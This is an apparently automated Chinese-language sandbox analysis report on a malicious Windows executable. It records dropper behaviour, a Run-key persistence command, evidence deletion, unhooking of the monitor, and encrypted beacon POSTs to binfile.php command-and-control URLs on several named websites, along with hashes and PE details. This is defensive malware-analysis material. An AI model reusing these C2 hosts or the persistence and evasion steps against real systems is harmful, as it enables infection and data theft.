魔盾安全分析报告 文件详细信息 特征

魔盾安全分析报告
分析类型
开始时间
结束时间
持续时间
分析引擎版本
FILE
2016-05-08 17:20:45
2016-05-08 17:23:13
148 秒
1.4-Maldun
虚拟机机器名
标签
虚拟机管理
开机时间
关机时间
win7-sp1-x64
win7-sp1-x64
KVM
2016-05-08 17:20:46
2016-05-08 17:23:13
魔盾分数
10.0
恶意的
文件详细信息
文件名
46.18.vir
文件大小
278530 字节
文件类型
PE32 executable (GUI) Intel 80386, for MS Windows
CRC32
BF3000F5
MD5
b24b98176f521e676b102df9bd38c146
SHA1
5269016499e8c910ed839489dd304da57f27156d
SHA256
033c8961bbefa6b4381f55a46b19178a9f9968937e53e77baa612b4a51402708
SHA512
ba04458395defb0c84a17e7bf743819962095d874e75584531c929780b5d0270897fa79af76ccc4a4b4e9ad60866ffa24439754
84427fb0433f74aef8881d39c
Ssdeep
6144:zaiexVOPAyCYERjivizKupuOEttisAGb7CmoPvrHG4D:zaiejZyCHWvHzttiBGbubPTHG8
PEiD
无匹配
Yara
VirusTotal
DebuggerException__SetConsoleCtrl ()
Check_OutputDebugStringA_iat ()
无此文件扫描结果
特征
创建RWX内存
通过进程尝试延迟分析任务
Process: wsmprovhost.exe tried to sleep 224 seconds, actually delayed analysis time by 0 seconds
从文件自身的二进制镜像中读取数据
self_read: process: wsmprovhost.exe, pid: 2708, offset: 0x0000003c, length: 0x00000002
self_read: process: wsmprovhost.exe, pid: 2708, offset: 0x00000140, length: 0x00000004
一个进程创建了一个隐藏窗口
Process: 46.18.vir -> C:\Windows\System32\cmd.exe
Process: wsmprovhost.exe -> wmic.exe
投放出一个二进制文件并执行它
binary: C:\Users\test\AppData\Roaming\wsmprovhost.exe
发起了一些HTTP请求
url: http://www.msftncsi.com/ncsi.txt
url: http://addagapublicschool.com/binfile.php
url: http://helpdesk.keldon.info/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/binfile.php
url: http://coldheartedny.com/wp-content/plugins/wordpress-mobile-pack/libs/htmlpurifier4.6.0/library/HTMLPurifier/DefinitionCache/Serializer/URI/binfile.php
url: http://closerdaybyday.info/wp-content/plugins/google-analytics-for-wordpress/vendor/composer/installers/tests/Composer/Installers/Test/binfile.php
url: http://closerdaybyday.info/cgi-sys/suspendedpage.cgi
url: http://studiosundaytv.com/wp-content/themes/sketch/binfile.php
url: http://thejonesact.com/wp-content/themes/sketch/binfile.php
二进制文件可能包含加密或压缩数据
section: name: ~f5c:D, entropy: 7.52, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size:
0x00007000, virtual_size: 0x000066a8
section: name: .erloc, entropy: 7.76, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size:
0x00010000, virtual_size: 0x0000f689
section: name: B;z^#, entropy: 7.63, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size:
0x0000a000, virtual_size: 0x000093e7
尝试删除从因特网下载文件的证据
file: C:\Users\test\AppData\Local\Temp\46.18.vir:Zone.Identifier
尝试断开连接或更改Cuckoo监控的Windows功能
unhook: function_name: NetUserGetLocalGroups, type: modification
unhook: function_name: NetUserGetInfo, type: modification
与尝试对后续步骤进行下载的木马dropper行为一致
File: /wp-content/themes/sketch/binfile.php was requested from hosts: studiosundaytv.com, thejonesact.com
将自己装载到Windows开机自动启动项目
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\FIX2-uhitkt
data: C:\Windows\SYSTEM32\CMD.EXE /C START "" "C:\Users\test\AppData\Roaming\wsmprovhost.exe"
一个进程将本机信息传递到一个远程主机
Beacon: wsmprovhost.exe: /wp-content/plugins/google-analytics-for-wordpress/vendor/composer/installers/tests/Composer/Installers/Test/binfile.php
创建一个隐藏文件或系统文件
file: C:\Users\test\AppData\Roaming\wsmprovhost.exe
尝试修改代理设置
生成一个自己的复制文件
copy: C:\Users\test\AppData\Roaming\wsmprovhost.exe
异常的二进制特征
anomaly: Actual checksum does not match that reported in PE header
运行截图
网络分析
访问主机记录
直接访问
IP地址
国家名
否
76.162.168.113
United States
是
74.125.23.113
United States
是
74.125.23.100
United States
否
23.62.109.65
United States
否
23.229.239.227
United States
否
194.228.3.204
Czech Republic
否
192.186.220.8
United States
否
192.185.151.39
United States
否
107.180.26.75
United States
域名解析
域名
响应
www.msftncsi.com
CNAME a1961.g2.akamai.net
A 23.62.109.66
A 23.62.109.65
CNAME www.msftncsi.com.edgesuite.net
addagapublicschool.com
A 23.229.239.227
helpdesk.keldon.info
CNAME keldon.info
A 194.228.3.204
coldheartedny.com
A 107.180.26.75
closerdaybyday.info
A 192.185.151.39
studiosundaytv.com
A 76.162.168.113
thejonesact.com
A 192.186.220.8
TCP连接
IP地址
端口
107.180.26.75
80
192.185.151.39
80
192.186.220.8
80
194.228.3.204
80
23.229.239.227
80
23.62.109.65
80
76.162.168.113
80
UDP连接
IP地址
端口
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.1
53
192.168.122.255
137
192.168.122.255
138
224.0.0.252
5355
224.0.0.252
5355
239.255.255.250
1900
40.69.40.157
123
192.168.122.69
53197
HTTP请求
URL
http://www.msftncsi.com/ncsi.txt
HTTP数据
GET /ncsi.txt HTTP/1.1
Connection: Close
User-Agent: Microsoft
NCSI
Host: www.msftncsi.co
m
http://addagapublicschool.com/binfile.php
POST /binfile.php HTTP
/1.1
Accept: p0\x02\x04h1\
x03\x048\x01{\x03\x1
60)\x18\xb8t{\x03
Content-Type: applicat
ion/x-www-form-urlenc
oded
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: addagapublicsch
ool.com
Content-Length: 645
Cache-Control: no-cach
e
data=010E4B3CA7B3F
BBC2EFCC500D3922CF
62C76DE136D912EA70
49EF557C1BC25A7D49
061B5DDD785748AE1
8C90021608B2BACBC8
887B348DF2264F2F76
E89F213D05207588EFF
C4D68E9AB54B8309A0
4DCB59BEA9A732E184
C77B4EC8CCD16CDC4
BE927664001B3A59DD
AD08751A7EB67F428D
E3A3E0277CAFF0021B
153F716A3EC0DF3A48
0CD1AB264BE99F903D
7BA13540FC36D0CAD
D1AFE4F8BD1E383C16
D04710BEBEA988CF82
C7AEEAD861F129828E
E179C2FBFAA3DEBEC2
1288EF4FD9D5C331E1
C6E84F194B9FBE2D51
8EB2828BE76F0056C7
96EA93500E3902DFFB
357E40A675629010BA
B72EB19CB1E1F2A9EB
0C6DA0177F27253ACB
7EB6F7A975EC7109EA
45927D42F96A95548C
37D88C5E63C0E5B5B8
59E354CC9588898824
E753B396207644D266
8401AD74A842D4D99
8D3EF4D9E22427FB97
D41CF5540C40839B90
http://helpdesk.keldon.info/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/binfile.php
POST /plugins/editors/ti
nymce/jscripts/tiny_mc
e/plugins/inlinepopups/
skins/clearlooks2/img/
binfile.php HTTP/1.1
Accept: p0\x02\x04h1\
x03\x048\x01{\x03\x1
60)\x18\xb8t{\x03
Content-Type: applicat
ion/x-www-form-urlenc
oded
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: helpdesk.keldon.
info
Content-Length: 645
Cache-Control: no-cach
e
data=010E4B3CA7B3F
BBC2EFCC500D3922CF
62C76DE136D912EA70
49EF557C1BC25A7D49
061B5DDD785748AE1
8C90021608B2BACBC8
887B348DF2264F2F76
E89F213D05207588EFF
C4D68E9AB54B8309A0
4DCB59BEA9A732E184
C77B4EC8CCD16CDC4
BE927664001B3A59DD
AD08751A7EB67F428D
E3A3E0277CAFF0021B
153F716A3EC0DF3A48
0CD1AB264BE99F903D
7BA13540FC36D0CAD
D1AFE4F8BD1E383C16
D04710BEBEA988CF82
C7AEEAD861F129828E
E179C2FBFAA3DEBEC2
1288EF4FD9D5C331E1
C6E84F194B9FBE2D51
8EB2828BE76F0056C7
96EA93500E3902DFFB
357E40A675629010BA
B72EB19CB1E1F2A9EB
0C6DA0177F27253ACB
7EB6F7A975EC7109EA
45927D42F96A95548C
37D88C5E63C0E5B5B8
59E354CC9588898824
E753B396207644D266
8401AD74A842D4D99
8D3EF4D9E22427FB97
D41CF5540C40839B90
http://coldheartedny.com/wp-content/plugins/wordpress-mobile-pack/libs/htmlpurifier4.6.0/library/HTMLPurifier/DefinitionCache/Serializer/URI/binfile.php
POST /wp-content/plugi
ns/wordpress-mobile-p
ack/libs/htmlpurifier-4.
6.0/library/HTMLPurifie
r/DefinitionCache/Seria
lizer/URI/binfile.php HT
TP/1.1
Accept: p0\x02\x04h1\
x03\x048\x01{\x03\x1
60)\x18\xb8t{\x03
Content-Type: applicat
ion/x-www-form-urlenc
oded
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: coldheartedny.co
m
Content-Length: 645
Cache-Control: no-cach
e
data=010E4B3CA7B3F
BBC2EFCC500D3922CF
62C76DE136D912EA70
49EF557C1BC25A7D49
061B5DDD785748AE1
8C90021608B2BACBC8
887B348DF2264F2F76
E89F213D05207588EFF
C4D68E9AB54B8309A0
4DCB59BEA9A732E184
C77B4EC8CCD16CDC4
BE927664001B3A59DD
AD08751A7EB67F428D
E3A3E0277CAFF0021B
153F716A3EC0DF3A48
0CD1AB264BE99F903D
7BA13540FC36D0CAD
D1AFE4F8BD1E383C16
D04710BEBEA988CF82
C7AEEAD861F129828E
E179C2FBFAA3DEBEC2
1288EF4FD9D5C331E1
C6E84F194B9FBE2D51
8EB2828BE76F0056C7
96EA93500E3902DFFB
357E40A675629010BA
B72EB19CB1E1F2A9EB
0C6DA0177F27253ACB
7EB6F7A975EC7109EA
45927D42F96A95548C
37D88C5E63C0E5B5B8
59E354CC9588898824
E753B396207644D266
8401AD74A842D4D99
8D3EF4D9E22427FB97
D41CF5540C40839B90
http://closerdaybyday.info/wp-content/plugins/google-analytics-forwordpress/vendor/composer/installers/tests/Composer/Installers/Test/binfile.php
POST /wp-content/plugi
ns/google-analytics-for
-wordpress/vendor/co
mposer/installers/tests
/Composer/Installers/T
est/binfile.php HTTP/1.
1
Accept: p0\x02\x04h1\
x03\x048\x01{\x03\x1
60)\x18\xb8t{\x03
Content-Type: applicat
ion/x-www-form-urlenc
oded
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: closerdaybyday.i
nfo
Content-Length: 645
Cache-Control: no-cach
e
data=010E4B3CA7B3F
BBC2EFCC500D3922CF
62C76DE136D912EA70
49EF557C1BC25A7D49
061B5DDD785748AE1
8C90021608B2BACBC8
887B348DF2264F2F76
E89F213D05207588EFF
C4D68E9AB54B8309A0
4DCB59BEA9A732E184
C77B4EC8CCD16CDC4
BE927664001B3A59DD
AD08751A7EB67F428D
E3A3E0277CAFF0021B
153F716A3EC0DF3A48
0CD1AB264BE99F903D
7BA13540FC36D0CAD
D1AFE4F8BD1E383C16
D04710BEBEA988CF82
C7AEEAD861F129828E
E179C2FBFAA3DEBEC2
1288EF4FD9D5C331E1
C6E84F194B9FBE2D51
8EB2828BE76F0056C7
96EA93500E3902DFFB
357E40A675629010BA
B72EB19CB1E1F2A9EB
0C6DA0177F27253ACB
7EB6F7A975EC7109EA
45927D42F96A95548C
37D88C5E63C0E5B5B8
59E354CC9588898824
E753B396207644D266
8401AD74A842D4D99
8D3EF4D9E22427FB97
D41CF5540C40839B90
http://closerdaybyday.info/cgi-sys/suspendedpage.cgi
GET /cgi-sys/suspende
dpage.cgi HTTP/1.1
Accept: p0\x02\x04h1\
x03\x048\x01{\x03\x1
60)\x18\xb8t{\x03
Connection: Keep-Aliv
e
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: closerdaybyday.i
nfo
Cache-Control: no-cach
e
http://studiosundaytv.com/wp-content/themes/sketch/binfile.php
POST /wp-content/the
mes/sketch/binfile.php
HTTP/1.1
Accept: p0\x02\x04h1\
x03\x048\x01{\x03\x1
60)\x18\xb8t{\x03
Content-Type: applicat
ion/x-www-form-urlenc
oded
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: studiosundaytv.c
om
Content-Length: 645
Cache-Control: no-cach
e
data=010E4B3CA7B3F
BBC2EFCC500D3922CF
62C76DE136D912EA70
49EF557C1BC25A7D49
061B5DDD785748AE1
8C90021608B2BACBC8
887B348DF2264F2F76
E89F213D05207588EFF
C4D68E9AB54B8309A0
4DCB59BEA9A732E184
C77B4EC8CCD16CDC4
BE927664001B3A59DD
AD08751A7EB67F428D
E3A3E0277CAFF0021B
153F716A3EC0DF3A48
0CD1AB264BE99F903D
7BA13540FC36D0CAD
D1AFE4F8BD1E383C16
D04710BEBEA988CF82
C7AEEAD861F129828E
E179C2FBFAA3DEBEC2
1288EF4FD9D5C331E1
C6E84F194B9FBE2D51
8EB2828BE76F0056C7
96EA93500E3902DFFB
357E40A675629010BA
B72EB19CB1E1F2A9EB
0C6DA0177F27253ACB
7EB6F7A975EC7109EA
45927D42F96A95548C
37D88C5E63C0E5B5B8
59E354CC9588898824
E753B396207644D266
8401AD74A842D4D99
8D3EF4D9E22427FB97
D41CF5540C40839B90
http://thejonesact.com/wp-content/themes/sketch/binfile.php
POST /wp-content/the
mes/sketch/binfile.php
HTTP/1.1
Accept: \x900\x02\x04
h1\x03\x048\x01{\x03\
x160)\x18\xb8t{\x03
Content-Type: applicat
ion/x-www-form-urlenc
oded
User-Agent: Mozilla/5.0
(Windows NT 6.3 rv:11
.0) like Gecko
Host: thejonesact.com
Content-Length: 645
Cache-Control: no-cach
e
data=010E4B3CA7B3F
BBC2EFCC500D3922CF
62C76DE136D912EA70
49EF557C1BC25A7D49
061B5DDD785748AE1
8C90021608B2BACBC8
887B348DF2264F2F76
E89F213D05207588EFF
C4D68E9AB54B8309A0
4DCB59BEA9A732E184
C77B4EC8CCD16CDC4
BE927664001B3A59DD
AD08751A7EB67F428D
E3A3E0277CAFF0021B
153F716A3EC0DF3A48
0CD1AB264BE99F903D
7BA13540FC36D0CAD
D1AFE4F8BD1E383C16
D04710BEBEA988CF82
C7AEEAD861F129828E
E179C2FBFAA3DEBEC2
1288EF4FD9D5C331E1
C6E84F194B9FBE2D51
8EB2828BE76F0056C7
96EA93500E3902DFFB
357E40A675629010BA
B72EB19CB1E1F2A9EB
0C6DA0177F27253ACB
7EB6F7A975EC7109EA
45927D42F96A95548C
37D88C5E63C0E5B5B8
59E354CC9588898824
E753B396207644D266
8401AD74A842D4D99
8D3EF4D9E22427FB97
D41CF5540C40839B90
静态分析
PE 信息
初始地址
0x00400000
入口地址
0x00402f10
声明校验值
0x7a0028c6
实际校验值
0x0004492b
最低操作系统版本要求
4.0
PDB路径
wet ertyyyyhj yu 5 ujy5_x.pdb
编译时间
2016-04-05 19:35:04
图标
图标精确哈希值
83381df857a1a2ed064fd834262cd4d1
图标相似性哈希值
398d88dc17aee878b63c2b4862f95acf
版本信息
LegalCopyright:
Copyright (C) Microsoft Corp. 1981-1997
InternalName:
wmiscmgr.dll
FileVersion:
5.00.1636.1
CompanyName:
Microsoft Corporation
ProductName:
Microsoft(R) Windows NT(R) Operating System
ProductVersion:
5.00.1636.1
FileDescription:
WMI Filter Manager
OriginalFilename:
wmiscmgr.dll
Translation:
0x0409 0x04b0
PE数据组成
名称
虚拟地址
虚拟大小
原始数据大小
特征
熵
(Entropy)
.text
0x00001000
0x0001bdaa
0x0001c000
IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ
6.56
~f5c:D
0x0001d000
0x000066a8
0x00007000
IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ
7.52
.data
0x00024000
0x00002c28
0x00002000
IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE
1.46
.erloc
0x00027000
0x0000f689
0x00010000
IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE
7.76
B;z^#
0x00037000
0x000093e7
0x0000a000
IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE
7.63
.rsrc
0x00041000
0x00049268
0x00004000
IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ
3.84
覆盖
偏移量:
0x00044000
大小:
0x00000002
资源
名称
偏移量
大小
语言
子语言
熵(Entropy)
文件类型
REGISTRY
0x00041ba4
0x000002d1
LANG_ENGLISH
SUBLANG_ENGLISH_US
5.37
ASCII text, with CRLF line terminators
REGISTRY
0x00041ba4
0x000002d1
LANG_ENGLISH
SUBLANG_ENGLISH_US
5.37
ASCII text, with CRLF line terminators
REGISTRY
0x00041ba4
0x000002d1
LANG_ENGLISH
SUBLANG_ENGLISH_US
5.37
ASCII text, with CRLF line terminators
REGISTRY
0x00041ba4
0x000002d1
LANG_ENGLISH
SUBLANG_ENGLISH_US
5.37
ASCII text, with CRLF line terminators
TYPELIB
0x00041e88
0x00000a48
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.54
data
RT_ICON
0x000428e0
0x000002e8
LANG_ENGLISH
SUBLANG_ENGLISH_US
2.50
data
RT_DIALOG
0x00043258
0x000001fc
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.45
data
RT_DIALOG
0x00043258
0x000001fc
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.45
data
RT_DIALOG
0x00043258
0x000001fc
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.45
data
RT_STRING
0x00043d30
0x000001ac
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.43
data
RT_STRING
0x00043d30
0x000001ac
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.43
data
RT_STRING
0x00043d30
0x000001ac
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.43
data
RT_STRING
0x00043d30
0x000001ac
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.43
data
RT_GROUP_ICON
0x00043eec
0x00000014
LANG_ENGLISH
SUBLANG_ENGLISH_US
2.16
MS Windows icon resource - 1 icon
RT_VERSION
0x00043f10
0x00000358
LANG_ENGLISH
SUBLANG_ENGLISH_US
3.51
data
导入
库 comdlg32.dll:
• 0x401164 - FindTextW
库 KERNEL32.dll:
• 0x401000 - InterlockedExchange
• 0x401004 - SetEnvironmentVariableA
• 0x401008 - GetCurrentThread
• 0x40100c - GetThreadPriority
• 0x401010 - GetTickCount
• 0x401014 - GetCommandLineA
• 0x401018 - GetVersionExA
• 0x40101c - GetStartupInfoA
• 0x401020 - SetUnhandledExceptionFilter
• 0x401024 - GetProcAddress
• 0x401028 - GetModuleHandleA
• 0x40102c - ExitProcess
• 0x401030 - WriteFile
• 0x401034 - GetStdHandle
• 0x401038 - GetModuleFileNameA
• 0x40103c - FreeEnvironmentStringsA
• 0x401040 - GetEnvironmentStrings
• 0x401044 - FreeEnvironmentStringsW
• 0x401048 - WideCharToMultiByte
• 0x40104c - GetLastError
• 0x401050 - GetEnvironmentStringsW
• 0x401054 - SetHandleCount
• 0x401058 - GetFileType
• 0x40105c - DeleteCriticalSection
• 0x401060 - TlsGetValue
• 0x401064 - TlsAlloc
• 0x401068 - TlsSetValue
• 0x40106c - TlsFree
• 0x401070 - InterlockedIncrement
• 0x401074 - SetLastError
• 0x401078 - InterlockedDecrement
• 0x40107c - GetCurrentThreadId
• 0x401080 - HeapDestroy
• 0x401084 - HeapCreate
• 0x401088 - VirtualFree
• 0x40108c - HeapFree
• 0x401090 - QueryPerformanceCounter
• 0x401094 - GetCurrentProcessId
• 0x401098 - GetSystemTimeAsFileTime
• 0x40109c - EnterCriticalSection
• 0x4010a0 - LeaveCriticalSection
• 0x4010a4 - OutputDebugStringA
• 0x4010a8 - FatalAppExitA
• 0x4010ac - SetConsoleCtrlHandler
• 0x4010b0 - FreeLibrary
• 0x4010b4 - LoadLibraryA
• 0x4010b8 - InitializeCriticalSection
• 0x4010bc - GetModuleHandleW
• 0x4010c0 - GetCPInfo
• 0x4010c4 - GetACP
• 0x4010c8 - GetOEMCP
• 0x4010cc - HeapAlloc
• 0x4010d0 - Sleep
• 0x4010d4 - VirtualAlloc
• 0x4010d8 - HeapReAlloc
• 0x4010dc - RtlUnwind
• 0x4010e0 - SetFilePointer
• 0x4010e4 - GetConsoleCP
• 0x4010e8 - GetConsoleMode
• 0x4010ec - UnhandledExceptionFilter
• 0x4010f0 - LCMapStringA
• 0x4010f4 - MultiByteToWideChar
• 0x4010f8 - LCMapStringW
• 0x4010fc - GetStringTypeA
• 0x401100 - GetStringTypeW
• 0x401104 - GetTimeFormatA
• 0x401108 - GetDateFormatA
• 0x40110c - GetUserDefaultLCID
• 0x401110 - GetLocaleInfoA
• 0x401114 - EnumSystemLocalesA
• 0x401118 - IsValidLocale
• 0x40111c - IsValidCodePage
• 0x401120 - TerminateProcess
• 0x401124 - GetCurrentProcess
• 0x401128 - FlushFileBuffers
• 0x40112c - SetStdHandle
• 0x401130 - WriteConsoleA
• 0x401134 - GetConsoleOutputCP
• 0x401138 - WriteConsoleW
• 0x40113c - VirtualProtect
• 0x401140 - GetSystemInfo
• 0x401144 - VirtualQuery
• 0x401148 - GetTimeZoneInformation
• 0x40114c - CloseHandle
• 0x401150 - CreateFileA
• 0x401154 - GetLocaleInfoW
• 0x401158 - CompareStringA
• 0x40115c - CompareStringW
投放文件
jar.py
文件名
相关文件
文件大小
jar.py
C:\gvszdsz\modules\packages\jar.py
1024 bytes
文件类型
data
MD5
0308e8a90dc6b102e85114ef692ad3ab
SHA1
16bf32acdc4b7abb4082af6465555ad9ec73cbc0
SHA256
8135c332cf1fecdc618834963719bd0c62b35ab672b234db4cc7233e4e17d5f4
SHA512
01ce26798f557d8463257de548b11edd78acd91bb0d5babfd6ca6810fd4af2caee099512feefec36bb6a2980c235573c98f2baa4
ae924a4b6003030319592496
Ssdeep
24:Gwf+ueTZ42ROQXXjW5E+wyevS67pqD+w+e92:GTvTSITTKEPyevj7pqD+wJ92
Yara
无匹配
VirusTotal
搜索相关分析
analyzer.py
文件名
analyzer.py
相关文件
C:\gvszdsz\analyzer.py
文件大小
41040 bytes
文件类型
data
MD5
230896e06218d9333b0f20a7fcf26e25
SHA1
8e35677749ad84a7f6da80295a6239657108fd66
SHA256
0e4abb592fcd1efc349fddc5245dc124fdb540e13d2df44bdfa218c965d8d483
SHA512
64513c11bf1edd55b8caf9b0cd3acc61a9d47ea1d3f4c912aac4e04f8934b44467962f43a3885971c782dffd62292747eec78417
04447068d956bc0c541cb37f
Ssdeep
768:unxL6JU8ZNHrYV+14l/iJ+RdlT0wR5yGKkTiTC6OAbeQK4MGqkVOXw/T0e6/sM:unxLsU8ZNHsli+R3T5ZKkTQLbeWYXS0r
Yara
无匹配
VirusTotal
搜索相关分析
wsmprovhost.exe
文件名
相关文件
wsmprovhost.exe
C:\Users\test\AppData\Roaming\wsmprovhost.exe
文件大小
278530 bytes
文件类型
PE32 executable (GUI) Intel 80386, for MS Windows
MD5
b24b98176f521e676b102df9bd38c146
SHA1
5269016499e8c910ed839489dd304da57f27156d
SHA256
033c8961bbefa6b4381f55a46b19178a9f9968937e53e77baa612b4a51402708
SHA512
ba04458395defb0c84a17e7bf743819962095d874e75584531c929780b5d0270897fa79af76ccc4a4b4e9ad60866ffa24439754
84427fb0433f74aef8881d39c
Ssdeep
6144:zaiexVOPAyCYERjivizKupuOEttisAGb7CmoPvrHG4D:zaiejZyCHWvHzttiBGbubPTHG8
Yara
VirusTotal
DebuggerException__SetConsoleCtrl ()
Check_OutputDebugStringA_iat ()
搜索相关分析
ppt.py
文件名
相关文件
ppt.py
C:\gvszdsz\modules\packages\ppt.py
文件大小
960 bytes
文件类型
data
MD5
c427df419ba9ab8f2067e50d3888eabf
SHA1
45adde552ed572b75214d9049c0725413b97870f
SHA256
1344de7dcd97b090aa00eb6a265ecbb47130b1e790b401a5ebaca8954b465c9c
SHA512
027d499b61c5b10f82fe64989dc6efd4f04e8baa37a1d375bc06b0dcca1a385057a75658e6ee5da380a8147b6b8a875945a70a
e05cfdc2d70bcd7254d4728b8c
Ssdeep
24:Gwf+ueTZ42YOQXXjW5m4NQFUlht/VkagkU3nBV:GTvTSBTTKmDerNkL33nBV
Yara
无匹配
VirusTotal
搜索相关分析
xls.py
文件名
相关文件
xls.py
C:\gvszdsz\modules\packages\xls.py
文件大小
944 bytes
文件类型
data
MD5
c712190209d18b5d77eb3cf0d49c9505
SHA1
995ce2c4ece9fac9c0a91b1a66dda7a4667ca23b
SHA256
43bdc1093be9819292bbc7e412fb6cf77158d79923ad7157795dd99fb3f9dca6
SHA512
56ee7614706884d368e86eb2163300acd9c7d9c023e6437e1b24aeb1f3306d9838c4b81ab222b20ff209e1c2c9e842ad0589e4
87d171c236072f4fdfe588117c
Ssdeep
12:GwU0vWA5etxozmwJjDpMnAUx5WQXXjH25DRykWR244CQewfoVZHPfQUExpeCLEp1:Gwf+ueTZ42DOQXXjW5vHcwgQrADcG
qaR
Yara
无匹配
VirusTotal
搜索相关分析
config.py
文件名
相关文件
config.py
C:\gvszdsz\lib\core\config.py
文件大小
2608 bytes
文件类型
data
MD5
24cdf73352c072995860e3402a52a522
SHA1
b97acc4de08ba5ecd41dda905968cc3812db4743
SHA256
04f07df4d3c1732a22e39dcf468c446ae6ac41251aca9e593141ba17503469ba
SHA512
19b7ec22d328fab5b545a1f3a860bb64b8aa74262edce7dbdb4f40df15be047db4a11354d658dad72372b86fd85266a0c009d7
671ff624ba718c59e3563d48a6
Ssdeep
48:GTvTSt6TTBQZYthTkC3Qr/juNGaaGtQ8g6YtTu4i75zxh:GTIA4Yt6C3Q7juN9g6Mm5zn
Yara
无匹配
VirusTotal
搜索相关分析
hashing.py
文件名
相关文件
hashing.py
C:\gvszdsz\lib\common\hashing.py
文件大小
928 bytes
文件类型
data
MD5
8507209e2e7c45d6f251623a91d7d11a
SHA1
74c97f6c6abaf800d699c5e32c29909d6fa80d36
SHA256
95dc294e5e873f97c345c7194cebce00f9dac4f21c461a681754cc0eb2493e9c
SHA512
b676ee1f16fb3c12314d2ab0a4237789e567de717a8a83749cd0e7a1c4be8f952bb5b8af124d1813522e698ae9a60606bfe3b1
60fd43573e3eab8edd92743f48
Ssdeep
24:Gwf+ueTZ42AOQXXjSw/176OMFjvCpV3HPVxx:GTvTSZTT8/FTGVXTx
Yara
无匹配
VirusTotal
搜索相关分析
pdf.py
文件名
pdf.py
相关文件
C:\gvszdsz\modules\packages\pdf.py
文件大小
864 bytes
文件类型
data
MD5
35fc4826576f63034e1eb32c2818eb1c
SHA1
b32e10e84e18ebb41b92e526cb2585e1e9eefcf2
SHA256
fac01c4ebc61f9d809e86c0b3e7606820d5d98cd65832b8d7810102327d3bf14
SHA512
af05d4f9c936ef09bc896d7f13de61c4924d2a35d7d0ee4d0e0ca35bc60ffb58a2226227bb2661c9dc372b9eca7efe973a645bb0
a91403a7cff6de203edbc0b6
Ssdeep
12:GwU0vWA5etxozmwJjDpMnIx5WQXXjH25DRyEK6MmDfKlznh3JvE2amDWxgBWGg/6:Gwf+ueTZ42IOQXXjW55ljK21lEv
Yara
无匹配
VirusTotal
搜索相关分析
msi.py
文件名
msi.py
相关文件
C:\gvszdsz\modules\packages\msi.py
文件大小
880 bytes
文件类型
data
MD5
119163cc7c295a9360ac5c375a8e6060
SHA1
7f958bf76e790437cb2601e00e476b269def90bc
SHA256
b38d0c852e4adfd962c8813fc12263ca56048edf3352310dc379653093777d3e
SHA512
fa79f3e1412bf99859e145154808f4f8f34aa974ada955e5a9768d5481f517cc9737598fde43f3dd316d01614a9d6279b80ec8a6
b3ce66b63a4e502fc610f2da
Ssdeep
24:Gwf+ueTZ421OQXXjW5fYxk+tGd/NZqM2qQ:GTvTSkTTKwxk+tGd1ZqMhQ
Yara
无匹配
VirusTotal
搜索相关分析
+recover+file.txt
文件名
相关文件
+recover+file.txt
C:\Users\test\Documents\+recover+file.txt
文件大小
256 bytes
文件类型
data
MD5
0f5380b6af340f164bedcd16a4886789
SHA1
18fd46747fd503fa3fc1c9472cbbcf1d00145244
SHA256
4e8d55672afd7454da177bd9e6a3e6b1466daac38849e603e671c3dbc22ad4b5
SHA512
172be5694d06c8c1c5bc622351b5c0413c68fed43269ae94d60e4cc11717fef5a500f6643b62e1d87c0c3928ed0b35cead1b50b
b207e97f673aae335e0a88eee
Ssdeep
6:Fgf1a7owHS7AuWWu/52NMPJCOX50ZsM/D5mqem81:Wky03Wu/52WEOJ+/Dhg
Yara
无匹配
VirusTotal
搜索相关分析
startup.py
文件名
相关文件
startup.py
C:\gvszdsz\lib\core\startup.py
文件大小
1264 bytes
文件类型
data
MD5
7a3fa927bb5af258676607bdf5bfdf45
SHA1
b6bd392cec6522e7ed95f89bdc37903802737be6
SHA256
f3db9c20e8c19fdce65b4bd04d93ff9d2b9f5110e18d0d8b125570b70654f3f3
SHA512
5d3bc3443a84c28b64772ad8a65d6a90952f645287ae1f639b0a11c7303c83c28a1550713fda026909238fe6179a8072e22b2b
1c1c6250fd736b1f32f4577ac1
Ssdeep
24:Gwf+ueTZ42COQXXjr4vUzxqPHPtCTitOVT3q3zkdqiD0AwXlx+lVq0JZ:GTvTSXTTpIYTTTqjkQI0A2lxsJZ
Yara
无匹配
VirusTotal
